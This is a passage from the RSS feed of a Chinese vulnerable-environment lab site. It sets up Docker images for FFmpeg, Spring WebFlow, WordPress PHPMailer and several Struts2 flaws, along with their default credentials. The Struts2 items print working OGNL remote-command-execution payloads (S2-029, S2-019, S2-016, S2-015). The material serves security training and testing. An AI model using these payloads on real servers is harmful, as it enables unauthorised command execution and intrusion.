        <description>&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;p&gt;FFmpeg是一个完整的跨平台解决方案，用于记录、转换流式传输音频和视频，可用于预览生成和视频转换的视频编码软件。已知FFmpeg可以处理可能包含对外部文件的引用的HLS播放列表,可以使用AVI文件中的GAB2字幕块来触发此功能，再通过XBIN编解码器检索转换节点的本地文件，从而导致了可以在转码后的视频里包含了本地文件.&lt;/p&gt; &lt;h3 id=&quot;影响范围&quot;&gt;影响范围&lt;/h3&gt; &lt;p&gt;小于 2.8.12, 3.0.x 以及 3.1.x 版本小于 3.1.9, 3.2.x 小于 3.2.6, 以及 3.3.x 版本小于 3.3.2&lt;/p&gt; &lt;h3 id=&quot;镜像信息&quot;&gt;镜像信息&lt;/h3&gt; &lt;table&gt; &lt;thead&gt; &lt;tr&gt; &lt;th style=&quot;text-align: center&quot;&gt;类型&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;值&lt;/th&gt; &lt;/tr&gt; &lt;/thead&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;FFmpeg&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;3.1.3&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;HTTP 端口&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;80&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;镜像 tag&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;f_ffmpeg_1&lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt; &lt;ol&gt; &lt;li&gt;拉取镜像到本地 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:f_ffmpeg_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;/li&gt; &lt;li&gt;启动环境 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 8000:80 medicean/vulapps:f_ffmpeg_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;blockquote&gt; &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 8000:80&lt;/code&gt; 前面的 8000...</description>
        <pubDate>Wed, 28 Jun 2017 14:15:32 +0000</pubDate>
        <link>http://vulapps.evalbug.com/f_ffmpeg_1/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/f_ffmpeg_1/</guid>
        
        <category>FFmpeg</category>
        
        <category>Arbitrary-File-Read</category>
        
        <category>Information-Disclosure</category>
        
        
        <category>FFmpeg</category>
        
      </item>
    
      <item>
        <title>Spring WebFlow 远程代码执行漏洞(CVE-2017-4971)</title>
        <description>&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;ul&gt; &lt;li&gt;&lt;a href=&quot;http://bobao.360.cn/learning/detail/3963.html&quot;&gt;CVE-2017-4971：Spring WebFlow 远程代码执行漏洞分析&lt;/a&gt;&lt;/li&gt; &lt;/ul&gt; &lt;h3 id=&quot;影响版本&quot;&gt;影响版本&lt;/h3&gt; &lt;p&gt;Spring WebFlow 2.4.0 ~ 2.4.4&lt;/p&gt; &lt;h3 id=&quot;镜像信息&quot;&gt;镜像信息&lt;/h3&gt; &lt;table&gt; &lt;thead&gt; &lt;tr&gt; &lt;th style=&quot;text-align: center&quot;&gt;类型&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;用户名&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;密码&lt;/th&gt; &lt;/tr&gt; &lt;/thead&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;测试帐号1&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;keith&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;melbourne&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;测试帐号2&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;erwin&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;leuven&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;测试帐号3&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;jeremy&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;atlanta&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;测试帐号4&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;scott&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;rochester&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;登陆地址&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;/login&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;-&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;容器tomcat端口&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;8080&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;-&lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt;...</description>
        <pubDate>Sat, 17 Jun 2017 18:26:53 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_springwebflow_1/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_springwebflow_1/</guid>
        
        <category>Spring</category>
        
        <category>RCE</category>
        
        
        <category>Spring</category>
        
      </item>
    
      <item>
        <title>XunFeng</title>
        <description>&lt;p&gt;&lt;strong&gt;巡风官方已经推出Docker环境，体验新版本建议直接使用官方镜像&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;https://github.com/ysrc/xunfeng&quot;&gt;项目地址： https://github.com/ysrc/xunfeng&lt;/a&gt;&lt;/p&gt; &lt;h3 id=&quot;工具简介&quot;&gt;工具简介&lt;/h3&gt; &lt;p&gt;&lt;strong&gt;巡风&lt;/strong&gt;是一款适用于企业内网的&lt;strong&gt;漏洞快速应急、巡航扫描&lt;/strong&gt;系统，通过搜索功能可清晰的了解内部网络资产分布情况，并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表。&lt;/p&gt; &lt;p&gt;其主体分为两部分：&lt;strong&gt;网络资产识别引擎&lt;/strong&gt;，&lt;strong&gt;漏洞检测引擎&lt;/strong&gt;。&lt;/p&gt; &lt;p&gt;网络资产识别引擎会通过用户配置的IP范围&lt;strong&gt;定期自动&lt;/strong&gt;的进行端口探测（支持调用MASSCAN），并进行指纹识别，识别内容包括：服务类型、组件容器、脚本语言、CMS。&lt;/p&gt; &lt;p&gt;漏洞检测引擎会根据用户指定的&lt;strong&gt;任务规则&lt;/strong&gt;进行定期或者一次性的漏洞检测，其支持2种插件类型、标示符与脚本，均可通过web控制台进行添加。&lt;/p&gt; &lt;h3 id=&quot;镜像信息&quot;&gt;镜像信息&lt;/h3&gt; &lt;table&gt; &lt;thead&gt; &lt;tr&gt; &lt;th style=&quot;text-align: center&quot;&gt;类型&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;用户名&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;密码&lt;/th&gt; &lt;/tr&gt; &lt;/thead&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;管理员&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;admin&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;xunfeng321&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;mongodb&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;scan&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;scanlol66&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;巡风物理路径&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;/opt/xunfeng&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;-&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;MASSCAN 路径&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;/opt/xunfeng/masscan/linux_64/masscan&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;-&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;mongodb 端口&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;65521&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;-&lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境&lt;/h3&gt; &lt;p&gt;1.拉取镜像到本地&lt;/p&gt; &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:tools_xunfeng &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt; &lt;p&gt;2.启动环境&lt;/p&gt;...</description>
        <pubDate>Sat, 17 Jun 2017 03:19:38 +0000</pubDate>
        <link>http://vulapps.evalbug.com/tools_xunfeng/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/tools_xunfeng/</guid>
        
        <category>XunFeng</category>
        
        <category>Tools</category>
        
        
      </item>
    
      <item>
        <title>WordPress &lt;= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)</title>
        <description>&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;p&gt;WordPress 是一种使用 PHP 语言开发的博客平台，用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统（CMS）来使用。WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 &amp;lt; 5.2.18)存在远程命令执行漏洞，攻击者只需巧妙地构造出一个恶意邮箱地址，即可写入任意文件，造成远程命令执行的危害。&lt;/p&gt; &lt;h3 id=&quot;影响版本&quot;&gt;影响版本&lt;/h3&gt; &lt;p&gt;WordPress &amp;lt;= 4.6&lt;/p&gt; &lt;h3 id=&quot;镜像信息&quot;&gt;镜像信息&lt;/h3&gt; &lt;table&gt; &lt;thead&gt; &lt;tr&gt; &lt;th style=&quot;text-align: center&quot;&gt;类型&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;用户名&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;密码&lt;/th&gt; &lt;/tr&gt; &lt;/thead&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;Mysql&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;root&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;root&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;/wp-admin/&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;admin&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;admin123&lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt; &lt;p&gt;1.拉取镜像到本地&lt;/p&gt; &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:w_wordpress_6 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt; &lt;p&gt;2.启动环境&lt;/p&gt; &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 8000:80 medicean/vulapps:w_wordpress_6 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt; &lt;blockquote&gt; &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 8000:80&lt;/code&gt; 前面的 8000 代表物理机的端口，可随意指定。&lt;/p&gt; &lt;/blockquote&gt;...</description>
        <pubDate>Fri, 16 Jun 2017 17:33:43 +0000</pubDate>
        <link>http://vulapps.evalbug.com/w_wordpress_6/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/w_wordpress_6/</guid>
        
        <category>WordPress</category>
        
        <category>PHPMailer</category>
        
        <category>Command-Execution</category>
        
        
        <category>WordPress</category>
        
      </item>
    
      <item>
        <title>Struts2 远程代码执行漏洞(S2-029)</title>
        <description>&lt;style type=&quot;text/css&quot;&gt;
.highlight pre{
  white-space: pre-wrap;
}    
&lt;/style&gt;

&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;http://struts.apache.org/docs/s2-029.html&quot;&gt;S2-029 公告&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;详细参考 &lt;a href=&quot;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&quot;&gt;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt;

&lt;ol&gt;
  &lt;li&gt;拉取镜像到本地
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_struts2_s2-029
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
  &lt;/li&gt;
  &lt;li&gt;启动环境
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 80:8080 medicean/vulapps:s_struts2_s2-029
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
    &lt;blockquote&gt;
      &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 80:8080&lt;/code&gt; 前面的 80 代表物理机的端口，可随意指定。&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt;

&lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;&lt;/p&gt;

&lt;h4 id=&quot;exp&quot;&gt;Exp&lt;/h4&gt;

&lt;p&gt;命令执行&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;(%23_memberAccess['allowPrivateAccess']=true,%23_memberAccess['allowProtectedAccess']=true,%23_memberAccess['excludedPackageNamePatterns']=%23_memberAccess['acceptProperties'],%23_memberAccess['excludedClasses']=%23_memberAccess['acceptProperties'],%23_memberAccess['allowPackageProtectedAccess']=true,%23_memberAccess['allowStaticMethodAccess']=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()))
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-029/s2-029-1.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;其它&quot;&gt;其它&lt;/h3&gt;

&lt;p&gt;感谢 &lt;a href=&quot;https://github.com/zerokeeper&quot;&gt;@zerokeeper&lt;/a&gt; 贡献&lt;/p&gt;
</description>
        <pubDate>Tue, 13 Jun 2017 10:44:00 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_struts2_s2-029/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_struts2_s2-029/</guid>
        
        <category>Struts2</category>
        
        <category>RCE</category>
        
        
        <category>Struts2</category>
        
      </item>
    
      <item>
        <title>Struts2 远程代码执行漏洞(S2-019)</title>
        <description>&lt;style type=&quot;text/css&quot;&gt;
.highlight pre{
  white-space: pre-wrap;
}    
&lt;/style&gt;

&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;http://struts.apache.org/docs/s2-019.html&quot;&gt;S2-019 公告&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;详细参考 &lt;a href=&quot;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&quot;&gt;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt;

&lt;ol&gt;
  &lt;li&gt;拉取镜像到本地
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_struts2_s2-019
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
  &lt;/li&gt;
  &lt;li&gt;启动环境
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 80:8080 medicean/vulapps:s_struts2_s2-019
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
    &lt;blockquote&gt;
      &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 80:8080&lt;/code&gt; 前面的 80 代表物理机的端口，可随意指定。&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt;

&lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;&lt;/p&gt;

&lt;h4 id=&quot;exp&quot;&gt;Exp&lt;/h4&gt;

&lt;p&gt;命令执行&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;?debug=command&amp;amp;expression=%23a%3D%28new%20java.lang.ProcessBuilder%28%27id%27%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read%28%23e%29%2C%23out%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23out.getWriter%28%29.println%28%27dbapp%3A%27%2bnew%20java.lang.String%28%23e%29%29%2C%23out.getWriter%28%29.flush%28%29%2C%23out.getWriter%28%29.close%28%29%0A
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-019/s2-019-1.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;其它&quot;&gt;其它&lt;/h3&gt;

&lt;p&gt;感谢 &lt;a href=&quot;https://github.com/zerokeeper&quot;&gt;@zerokeeper&lt;/a&gt; 贡献&lt;/p&gt;
</description>
        <pubDate>Tue, 13 Jun 2017 10:43:59 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_struts2_s2-019/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_struts2_s2-019/</guid>
        
        <category>Struts2</category>
        
        <category>RCE</category>
        
        
        <category>Struts2</category>
        
      </item>
    
      <item>
        <title>Struts2 远程代码执行漏洞(S2-016)</title>
        <description>&lt;style type=&quot;text/css&quot;&gt;
.highlight pre{
  white-space: pre-wrap;
}    
&lt;/style&gt;

&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;http://struts.apache.org/docs/s2-016.html&quot;&gt;S2-016 公告&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;参考 &lt;a href=&quot;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&quot;&gt;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt;

&lt;ol&gt;
  &lt;li&gt;拉取镜像到本地
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_struts2_s2-016
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
  &lt;/li&gt;
  &lt;li&gt;启动环境
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 80:8080 medicean/vulapps:s_struts2_s2-016
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
    &lt;blockquote&gt;
      &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 80:8080&lt;/code&gt; 前面的 80 代表物理机的端口，可随意指定。&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt;

&lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;&lt;/p&gt;

&lt;h4 id=&quot;exp&quot;&gt;Exp&lt;/h4&gt;

&lt;p&gt;命令执行&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;/default.action?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%7D
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-016/s2-016-1.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;其它&quot;&gt;其它&lt;/h3&gt;

&lt;p&gt;感谢 &lt;a href=&quot;https://github.com/zerokeeper&quot;&gt;@zerokeeper&lt;/a&gt; 贡献&lt;/p&gt;
</description>
        <pubDate>Tue, 13 Jun 2017 10:43:58 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_struts2_s2-016/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_struts2_s2-016/</guid>
        
        <category>Struts2</category>
        
        <category>RCE</category>
        
        
        <category>Struts2</category>
        
      </item>
    
      <item>
        <title>Struts2 远程代码执行漏洞(S2-015)</title>
        <description>&lt;style type=&quot;text/css&quot;&gt;
.highlight pre{
  white-space: pre-wrap;
}    
&lt;/style&gt;

&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;http://struts.apache.org/docs/s2-015.html&quot;&gt;S2-015 公告&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;参考 &lt;a href=&quot;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&quot;&gt;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt;

&lt;ol&gt;
  &lt;li&gt;拉取镜像到本地
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_struts2_s2-015
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
  &lt;/li&gt;
  &lt;li&gt;启动环境
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 80:8080 medicean/vulapps:s_struts2_s2-015
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
    &lt;blockquote&gt;
      &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 80:8080&lt;/code&gt; 前面的 80 代表物理机的端口，可随意指定。&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt;

&lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;&lt;/p&gt;

&lt;h4 id=&quot;exp&quot;&gt;Exp&lt;/h4&gt;

&lt;p&gt;命令执行&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;/${ %23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}.action
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-015/s2-015-1.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;其它&quot;&gt;其它&lt;/h3&gt;

&lt;p&gt;感谢 &lt;a href=&quot;https://github.com/zerokeeper&quot;&gt;@zerokeeper&lt;/a&gt; 贡献&lt;/p&gt;
</description>
        <pubDate>Tue, 13 Jun 2017 10:43:57 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_struts2_s2-015/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_struts2_s2-015/</guid>
        
        <category>Struts2</category>
        
        <category>RCE</category>
        
        
        <category>Struts2</category>
        
      </item>
    
      <item>
        <title>Struts2 远程代码执行漏洞(S2-013)</title>
        <description>&lt;style type=&quot;text/css&quot;&gt;
.highlight pre{
  white-space: pre-wrap;
}    
&lt;/style&gt;

&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;http://struts.apache.org/docs/s2-013.html&quot;&gt;S2-013 公告&lt;/a&gt;&lt;/li&gt;
